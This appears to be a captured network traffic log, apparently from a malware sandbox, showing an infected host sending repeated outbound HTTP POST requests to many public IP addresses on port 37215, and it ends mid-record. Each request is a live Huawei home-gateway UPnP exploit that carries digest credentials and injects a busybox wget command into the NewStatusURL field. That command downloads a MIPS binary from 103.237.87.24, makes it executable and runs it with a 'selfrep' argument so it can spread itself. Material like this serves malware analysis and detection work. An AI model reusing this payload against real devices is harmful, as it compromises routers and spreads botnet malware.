                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1465192.168.2.134757241.21.99.15237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485265970 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1466192.168.2.133846041.183.84.7337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485280037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1467192.168.2.135525041.46.7.16037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485291004 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1468192.168.2.13441509.121.245.22637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485291958 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1469192.168.2.1337272186.95.175.337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485296965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1470192.168.2.1333602157.215.95.25537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485306025 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1471192.168.2.1334912197.70.69.13237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485770941 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1472192.168.2.1344034185.246.141.17937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485822916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1473192.168.2.135528641.49.132.16637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485829115 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  1474192.168.2.1341164157.35.2.4237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:02.485912085 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 